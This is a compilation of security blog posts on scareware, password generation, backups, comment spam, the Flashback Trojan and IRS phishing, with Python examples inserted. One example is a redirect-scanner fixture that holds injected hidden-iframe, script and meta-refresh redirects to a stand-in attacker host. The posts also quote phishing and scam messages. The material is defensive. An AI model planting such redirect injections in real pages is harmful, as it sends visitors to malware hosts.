Fake antivirus, also known as scareware, rogue antivirus and scamware, is one of the most common threats you will encounter on the web today. You’ve probably seen it before, and if you’re smart, you didn’t fall for the scam. The tactic this junk uses is to lure users to malicious sites and then scare them with fake threat warnings in an attempt to get them to pay for fake – and useless – threat removal tools.
Unfortunately the tactics these criminals use are highly effective against the average user who doesn’t know any better; this is why the scams are so prevalent – they make a tremendous amount of money for the criminals. For this reason, they are not going to go away any time soon and you need to know everything you can about how to keep this threat off of your network and away from your users.
Sophos has released a white paper entitled “Stopping Fake Antivirus: How to Keep Scareware off Your Network.” It contains a wealth of information and tips on how to combat this threat. I highly recommend you download and read it.
I immediately downloaded it and checked it out. I’m impressed. This will save me hours of work coming up with my own campaign and presentation for our employee Lunch-n-Learns.
One of the things I really like about this campaign is that each email tip links to a short video on the topic. Here’s the first one in the series, “Don’t Get Tricked:”
Video: http://www.youtube.com/v/rLO4EKvJbEM
I highly recommend you check this out.
I love crossword puzzles. I’ve been doing them my whole life. My wife loves Sudoku puzzles. I can beat her any day at crossword; she slaughters me at Sudoku. This led me to an interesting realization about passwords: People tend to remember things they have an affinity for. Corollary: People are competent using tools they understand.
So, using crossword as an example, why not use one as a password generation matrix? You could fill it in with random characters, or you could solve the puzzle (in pencil, of course) and then randomly substitute numerals, upper/lower case letters and symbols.
Take a highlighter and mark off an 8, 10 or 12 character password. Make it 16 characters if that makes you feel better. When you are done using that password, mark it out in red ink and highlight another one. Use your imagination. Think. Get creative. Fill in those boxes with whatever comes to mind.
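The same idea in code, as an added example that is not part of the original post: a grid is filled from a cryptographically secure random source (the paper version's "random characters"), a run of cells is read across or down as the password, and used cells are tracked so a run is never reused (the red-ink rule). The character pool, grid size and helper names are my own choices for the illustration; the entropy figure assumes the characters really are uniformly random, which a hand-filled or solved puzzle would not be.

```python
import math
import secrets
import string

# Character pool for filling the grid: letters, digits and a few symbols,
# the same mix the post suggests substituting into a solved puzzle.
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*-_=+?"


def make_grid(rows, cols, alphabet=ALPHABET):
    """Fill a rows x cols grid with characters drawn from a CSPRNG (secrets)."""
    return [[secrets.choice(alphabet) for _ in range(cols)] for _ in range(rows)]


def take_password(grid, used, length, row, col, direction):
    """Read `length` cells from (row, col) going 'across' or 'down'.

    `used` is the set of cells already marked in red ink; any overlap is refused
    so that no password is ever handed out twice.
    """
    dr, dc = (0, 1) if direction == "across" else (1, 0)
    cells = [(row + i * dr, col + i * dc) for i in range(length)]
    for r, c in cells:
        if r >= len(grid) or c >= len(grid[0]):
            raise ValueError("password runs off the grid")
        if (r, c) in used:
            raise ValueError("cell already used; highlight a fresh run")
    used.update(cells)
    return "".join(grid[r][c] for r, c in cells)


def pick_password(grid, used, length):
    """Choose a random unused run of `length` cells.

    Returns (password, row, col, direction) and marks the run as used.
    """
    rows, cols = len(grid), len(grid[0])
    candidates = []
    for r in range(rows):
        for c in range(cols):
            if c + length <= cols and all((r, c + i) not in used for i in range(length)):
                candidates.append((r, c, "across"))
            if r + length <= rows and all((r + i, c) not in used for i in range(length)):
                candidates.append((r, c, "down"))
    if not candidates:
        raise ValueError("grid exhausted; make a new one")
    r, c, d = secrets.choice(candidates)
    return take_password(grid, used, length, r, c, d), r, c, d


def entropy_bits(length, alphabet=ALPHABET):
    """Entropy of a uniformly random password of `length` chars over `alphabet`."""
    return length * math.log2(len(alphabet))


if __name__ == "__main__":
    grid = make_grid(15, 15)          # a 15x15 "puzzle"
    used = set()
    for n in (8, 12, 16):
        pw, r, c, d = pick_password(grid, used, n)
        print(f"{n:2d} chars at row {r}, col {c}, {d}: {pw}  (~{entropy_bits(n):.0f} bits)")
```

With the 75-character pool above, a 12-character run carries roughly 75 bits of entropy; the pencil-and-paper version is weaker because human "random" substitutions are far from uniform, which is the practical caveat to the post's method.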
(Note: Someone recently told me that they had searched the web and found that I write a lot about passwords. I asked them if they had read any of the articles. They had not. I asked why. They told me that they had their own system and didn’t need to read about it. I asked them about their “system.” I won’t tell you what they told me. I write about this subject a lot in the hope that someday, maybe, someone will realize that passwords can be fun and will start doing fun things to generate secure passwords…)
A client called today saying that his remote login quit working on his laptop. When he would type in the URL of the Remote Web Workspace login for Microsoft Small Business Server 2011, he would get the dreaded “Internet Explorer cannot display the web page” message. I tried every suggestion that Microsoft had come up with:
- Delete browsing history
- Reset IE to defaults
- Edit two different registry keys
- Clear SSL cache
- Delete and re-add certificate
- Flush DNS
- Check HOSTS file
- Check DNS settings
- Disable Add-ons
- Set Advanced settings to prompt for any active content
Nothing worked. I even upgraded to IE9 and reset it. No joy there, either. So we got another fellow on the line from the company who had recently migrated my client’s server to the cloud to see if it could be related to going virtual. He basically ran down the list with me and verified that nothing worked.
We kept going back to Trusted Sites because, naturally, we want the lowest possible security settings so everything would be allowed. Logical, right? Well, forget logic. It doesn’t apply here (and sometimes doesn’t in things Microsoft).
We set up a Webex and the other tech started looking around. We went right back to Trusted Sites and looked. Everything looked right; so the tech deleted the URLs from the Trusted Sites list and voila! It was all good. Like I said, forget logic.
Sometimes you just have to do what seems the most counter-intuitive.
Researchers say that infected WordPress sites were the initial attack vector for the Flashback Trojan horse program. Anywhere from 30,000 to 100,000 sites are thought to have been infected during February and early March with 85 percent of the infected machines located in the U.S. According to Kaspersky Lab researchers, the infected sites were rigged with code that silently redirected visitors to a malicious server.
The vulnerability that Flashback exploits is a known vulnerability in Java. Apple has issued a patch and Kaspersky has an online detection and removal tool available.
According to Dark Reading, this is a good example of why Mac users are an APT (Advanced Persistent Threat) attacker’s dream come true:
[Mac users might not have a lot of exploits to worry about, but their lack of security worries makes them an APT attacker's dream come true. See Anatomy Of A Mac APT Attack. ]
At the college where I am Net Admin, we have posted notices to all Mac users to protect themselves against this threat. We have also patched our 75+ iMacs in the Graphics Design and Photography labs.
With the growing popularity of Macs in the enterprise and with many consumers moving to “all Apple” technology — probably spurred on by the popularity of the iPhone and iPad — it’s no surprise that attackers have begun to zero in on the Mac.
Today, March 31st, is World Backup Day 2012. The tagline reads: “Don’t be an April Fool. Backup your files. Check your restores.” You can visit the site for some great deals on backup services. They have a list of featured articles all about backup and a link to a great infographic on Pinterest. To save you time, I’ve placed the infographic below this post.
Hostgator’s monthly newsletter makes a good point: “Our whole lives are found on our hard drives. When a hard drive fails and the data isn’t backed up, it’s gone. And it’s not a question of IF your drive will fail, it’s WHEN.”
Those of us in the know, who back up our data on a regular basis, are fairly well versed in some of the scary statistics about data loss and data security. For those who aren’t as familiar with the stats, here are the main ones in favor of backups:
- All hard drives will crash during their lifetime
- More than 1 in 10 laptops will be stolen in their lifetime
- A laptop is stolen every 53 seconds
- Every year 46% of computer users lose their music, photos, and documents
- 50% of all hard drives will crash within 5 years
- 89.1% of PC users don’t perform regular backups
- A recent study from Gartner, Inc., found that 90 percent of companies that experience data loss go out of business within two years.
- 70 percent of companies go out of business after a major data loss
While it’s on your mind, go ahead and take advantage of one of the free backup offers commemorating World Backup Day 2012. I promise, you’ll rest easier tonight.
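“Check your restores” is the half of the tagline people skip, so here is an added example (not from the World Backup Day site or the original post) of what that check looks like in practice: build a SHA-256 manifest of the source files at backup time, then compare the restored copy against it and report anything missing, altered or unexpected. The file names and the temporary-directory walkthrough in `demo()` are constructed for the illustration.

```python
import hashlib
import os
import shutil
import tempfile


def build_manifest(root):
    """Map each file's path (relative to root) to its SHA-256 hex digest."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            manifest[rel] = h.hexdigest()
    return manifest


def verify_restore(manifest, restored_root):
    """Compare a restored tree against the manifest taken at backup time.

    Returns (missing, corrupted, extra): files absent from the restore, files
    whose content no longer matches, and files the backup never contained.
    """
    restored = build_manifest(restored_root)
    missing = sorted(p for p in manifest if p not in restored)
    corrupted = sorted(p for p in manifest if p in restored and restored[p] != manifest[p])
    extra = sorted(p for p in restored if p not in manifest)
    return missing, corrupted, extra


def demo():
    """Constructed end-to-end run: back up, verify, then damage the copy and verify again."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "src")
        os.makedirs(os.path.join(src, "docs"))
        with open(os.path.join(src, "thesis.txt"), "w") as f:
            f.write("chapter one\n")
        with open(os.path.join(src, "docs", "notes.txt"), "w") as f:
            f.write("todo\n")
        with open(os.path.join(src, "photo.bin"), "wb") as f:
            f.write(bytes(range(256)))

        manifest = build_manifest(src)                 # taken when the backup is made
        backup = shutil.copytree(src, os.path.join(tmp, "backup"))
        good = verify_restore(manifest, backup)        # a clean restore: ([], [], [])

        # Simulate what a bad restore looks like: one file lost, one silently
        # corrupted (a single byte flipped), one stray file that was never backed up.
        os.remove(os.path.join(backup, "docs", "notes.txt"))
        with open(os.path.join(backup, "photo.bin"), "r+b") as f:
            f.seek(10)
            f.write(b"\xff")
        with open(os.path.join(backup, "stray.tmp"), "w") as f:
            f.write("left over\n")
        bad = verify_restore(manifest, backup)
        return good, bad


if __name__ == "__main__":
    clean, damaged = demo()
    print("clean restore:", clean)
    print("damaged restore (missing, corrupted, extra):", damaged)
```

The point of hashing rather than comparing sizes or timestamps is that silent corruption on a dying drive changes content without changing either; a manifest kept separately from the backup is what makes that detectable.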
I have been getting a deluge of spam comments to my various posts on this blog from one Glory Johnson who goes by various nicknames. The most common nickname is “Glory39,” but the number is a moving target; “she” has posted as Glory342, Glory50, Glory34, and Glory38 among others. Well over 50 comments just today and they are still coming in. This is obviously a come-on for a scam, I’m just not sure what kind. I doubt that “Glory Johnson” is actually a female, nor does she have amorous intentions.
See what you think about the text of the comments. They are all identical, regardless of which version of “Glory” is posting them:
Hello My name is glory johnson i saw your profile today techtarget.com) and became intrested in you,i will also like to know you the more,and i want you to send an email to my email address so i can give you my picture for you to know whom i am.Here is my email address ( gloryjohnson001 at yahoo.com) I believe we can move from here!I am waiting for your mail to my email address above. glory. (Remeber the distance or colour does not matter but love matters alot in life) please contact me here ( gloryjohnson001 at yahoo.com)
I decided to play along and use one of my anonymous email addresses to appear to take the bait. Here’s what I sent to “her” email address:
Subject: I will like to know you the more
8:09 PM (16 minutes ago)
You sent me this. I am wanting picture.
My name is glory johnson
i saw your profile today(techtarget.com) and
became intrested in you,i will also like to know you the more,and i
want you to send an email to my email address so i can give you my picture for you to know whom i am.Here is my email address (firstname.lastname@example.org)
I believe we can move from here!I am waiting for your mail to my email address above.
(Remeber the distance or colour does not matter but love matters alot in life)
please contact me here (email@example.com)
Unless this post has just tipped off the scammers, I’ll keep you posted on what transpires.
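The two tells in this flood are exactly the ones a comment filter can key on: the body text is identical from one comment to the next, and the author names are one stem plus a rotating number. As an added example (not code from the blog or its comment system), the snippet below normalizes each comment body, groups comments by fingerprint, and flags any cluster posted under several different names, reporting the shared nickname stem. The sample comments are constructed to mimic the pattern described above; the threshold of three names is an arbitrary choice.

```python
import hashlib
import re
from collections import defaultdict

# Constructed sample resembling the template in the post; the author names rotate
# the way the post describes, and the body varies only in case, spacing and punctuation.
TEMPLATE = ("Hello My name is glory johnson i saw your profile today and became "
            "intrested in you, i will also like to know you the more")
SAMPLE_COMMENTS = [
    ("Glory39", TEMPLATE),
    ("Glory342", TEMPLATE.upper()),
    ("Glory50", TEMPLATE.replace(" ", "  ")),
    ("Glory34", TEMPLATE + "!!"),
    ("Ken", "Great tip on SpinRite, thanks."),
    ("Dave", "Great tip on SpinRite, thanks."),
]

NICK_PATTERN = re.compile(r"^([A-Za-z]+)(\d+)$")   # e.g. Glory39 -> ("Glory", "39")


def normalize(text):
    """Lower-case, collapse whitespace and drop punctuation so trivial edits collide."""
    collapsed = re.sub(r"\s+", " ", text.lower())
    return re.sub(r"[^a-z0-9 ]", "", collapsed).strip()


def fingerprint(text):
    """Stable identifier for a normalized comment body."""
    return hashlib.sha256(normalize(text).encode("utf-8")).hexdigest()


def cluster_duplicates(comments, min_authors=3):
    """Group comments with identical normalized bodies.

    Returns {fingerprint: [author, ...]} for clusters that were posted under at
    least `min_authors` distinct names; two friends quoting each other are ignored.
    """
    groups = defaultdict(list)
    for author, text in comments:
        groups[fingerprint(text)].append(author)
    return {fp: authors for fp, authors in groups.items() if len(set(authors)) >= min_authors}


def rotating_nicknames(authors):
    """Return the shared alphabetic stem if every name is that stem plus a number, else None."""
    stems = set()
    for author in authors:
        m = NICK_PATTERN.match(author)
        if not m:
            return None
        stems.add(m.group(1).lower())
    return stems.pop() if len(stems) == 1 else None


def flag_spam(comments, min_authors=3):
    """List (nickname_stem_or_None, authors) for every duplicate-body cluster worth blocking."""
    return [(rotating_nicknames(authors), authors)
            for authors in cluster_duplicates(comments, min_authors).values()]


if __name__ == "__main__":
    for stem, authors in flag_spam(SAMPLE_COMMENTS):
        print(f"duplicate body from {len(authors)} names (stem {stem!r}): {authors}")
```

Hashing the normalized body rather than the raw text is what makes the case-flip and double-space variants collapse into one cluster; a moderation plugin would act on the fingerprint (hold or discard) rather than on the ever-changing author name.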
Part of data security is protecting the storage media from damage and maintaining a high level of data integrity. For hard drive maintenance and recovery, there is no better tool than SpinRite, developed by Steve Gibson of GRC.com. I recently had a great experience with it at Antonelli College where I am the network administrator, so I told Steve about it. While listening to Security Now! Episode 345, I was surprised and delighted to hear Steve read my story. Here’s the excerpt:
Steve: And I heard from a listener, Ken Harthun, who wrote to me on the 19th of February: “SpinRite saves a student’s laptop.” He said, “Steve, I’m a loyal listener of Security Now!, having listened to every single episode. That first episode was only 18 minutes and left me wanting more.” Well, we’ve taken care of that.
Leo: Was it that short? Wow.
Steve: Wow. And that was your original concept, Leo, was just to do sort of a check-in on the week. It’s like, okay, well, that didn’t last long. And it’s funny, too, because I remember Elaine quoting me for transcription, didn’t sound like it was going to be very expensive, either.
Leo: No, sorry about that. Whoops.
Steve: Oh, it’s been worthwhile, and I haven’t looked back.
Leo: Thank you.
Steve: So he said, “Today’s episode was a little over two hours and still left me wanting more. You are often the source and inspiration for my Security Corner blog posts over at IT Knowledge Exchange. So a big geek thank you to you and Leo. Please continue.” He says, “I first used SpinRite in 1999 – it was v5.0 – to recover a floppy disk that had been corrupted. Since that day I’ve insisted that wherever I worked, the IT department agreed to make SpinRite available to me should the need arise, and too often it has. In my private service world, I always insist that, if SpinRite recovers the drive for my client, that my client purchase a copy. Needless to say, there have been a few sales as a result.”
Leo: That’s a good idea. That’s a good way to do it.
Steve: I have no problem with that, yeah. He says, “I have my own copy, of course, and last summer I insisted that my new employer, Antonelli College, where I am the network administrator, purchase a site license. Well, that’s a good thing because last week it saved one of their students’ laptops and all of her interior design coursework. Windows was throwing all kinds of errors. The wireless wouldn’t connect. She gave me a list of seemingly random errors that didn’t seem to make a whole lot of sense. But they pointed toward a hard drive failure. I was about to attempt to backup the data and restore the system when it just completely locked up, and I had to force a shutdown with the power button. On restart it just hung at the starting Windows screen and would go no further. I could hear the drive thrashing about. Not good.
“Enter SpinRite. I booted up from my thumb drive and ran it at Level 2. After a couple of hours SpinRite reported that it was finished, though no errors or bad sectors were found,” which of course is a story we’ve heard many times. And I’ve explained why that doesn’t mean SpinRite didn’t do anything. He says, “On reboot, the system came right up, faster than ever, connected to the wireless, and immediately began downloading updates. I completed the updates, ran a few tests, and pronounced the patient healthy. Needless to say, the student was ecstatic. And thanks to SpinRite, I did my part to provide a ‘superior student experience.’” He says, “Part of our vision statement for the campus.” He said, “Steve, SpinRite is absolutely the best hard drive maintenance and recovery utility on the planet, and maybe in the universe. It’s worth 10 times the price you charge for it. Thanks for all you do. Ken Harthun.”
And he said, “P.S.: I’ve never had a hard drive failure, and I attribute that to my using SpinRite on my own systems on a regular basis.” And of course we understand also why it is a good preventive maintenance utility. Running it on a drive, even a quick Level 1, shows the drive where it’s got problems developing that it’s able to correct before they get critical.
It’s that time of the year again and while this particular fake notice has been around before, the frequency seems to peak around tax time in the U.S. It’s a wonder the ploy even works because the IRS NEVER communicates with taxpayers via email. Nevertheless, people fall for it and find themselves infected with malware. Of course, if you are not in the U.S. this one is easy to spot, since the IRS would have no business with you in the first place.
The message comes with one of these subject lines:
- Rejection of your tax appeal.
- Your tax return appeal is declined.
- IRS notification of your tax appeal status.
I’ve seen other variations in the past, but the above are the most common ones.
The text of a typical message is shown below. Variations are common, but generally don’t stray far from this example:
Dear Business owner,
Hereby you are notified that your Income Tax Refund Appeal id#6636527 has been DECLINED. If you believe the IRS did not properly estimate your case due to a misunderstanding of the facts, be prepared to provide additional information. You can obtain the rejection details and re-submit your appeal by using the instructions in the attachment.
Internal Revenue Service
Of course, the attachment is malware and anyone clicking the link will be immediately infected. Sophos detects it as Mal/Iframe-AE.
So you don’t have to surf away from here, here is the video.
Video: http://www.youtube.com/v/VTLA-LSJAcc
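Both the Flashback story (WordPress pages “rigged with code that silently redirected visitors”) and the IRS attachment above (an Iframe-family detection) come down to the same thing: HTML that sends the visitor somewhere else without showing it. As an added example, not code from Sophos, Kaspersky or the original post, here is a small scanner that flags the three commonest forms of that: an iframe that is hidden or sized to a few pixels, a `<meta http-equiv="refresh">` pointing elsewhere, and an inline script that assigns to `location`. The sample page, the `attacker.example` host and the pixel threshold are constructed for the illustration; a real page would be fetched or read from disk and fed to `scan_html()`.

```python
import re
from html.parser import HTMLParser

# Constructed sample: a benign video embed plus three injected redirect techniques.
SAMPLE_HTML = """<html><body>
<iframe src="https://www.youtube.com/embed/abc" width="425" height="350"></iframe>
<iframe src="http://attacker.example/in.php" width="1" height="1" style="visibility: hidden"></iframe>
<script>window.top.location.href="http://attacker.example/landing";</script>
<meta http-equiv="refresh" content="0;url=http://attacker.example/go">
</body></html>"""

TINY_PX = 4  # an iframe at or below this many pixels on both axes is effectively invisible


def _px(value):
    """Parse a width/height attribute such as '1' or '425px'; None if absent or odd."""
    try:
        return int(str(value).strip().rstrip("px"))
    except (TypeError, ValueError):
        return None


class RedirectScanner(HTMLParser):
    """Collects (kind, target) findings for hidden iframes, meta refreshes and script redirects."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = "display:none" in style or "visibility:hidden" in style
            w, h = _px(a.get("width")), _px(a.get("height"))
            tiny = w is not None and h is not None and w <= TINY_PX and h <= TINY_PX
            if hidden or tiny:
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url=(\S+)", a.get("content") or "", re.IGNORECASE)
            self.findings.append(("meta-refresh", m.group(1) if m else ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data; look for location assignments.
        if self._in_script:
            m = re.search(r"(?:top|window|document)\.location(?:\.href)?\s*=\s*[\"']([^\"']+)", data)
            if m:
                self.findings.append(("script-redirect", m.group(1)))


def scan_html(html):
    """Return the list of (kind, target) findings for one HTML document."""
    parser = RedirectScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for kind, target in scan_html(SAMPLE_HTML):
        print(f"{kind:16s} -> {target}")
```

Run over a site's rendered pages, an empty result is the normal case; the visible YouTube embed in the sample is deliberately not flagged, since a legitimate iframe has a size and is not styled away. Obfuscated scripts (the string assembled at runtime) would slip past the regex, which is why this is a triage check and not a substitute for the vendor tools named above.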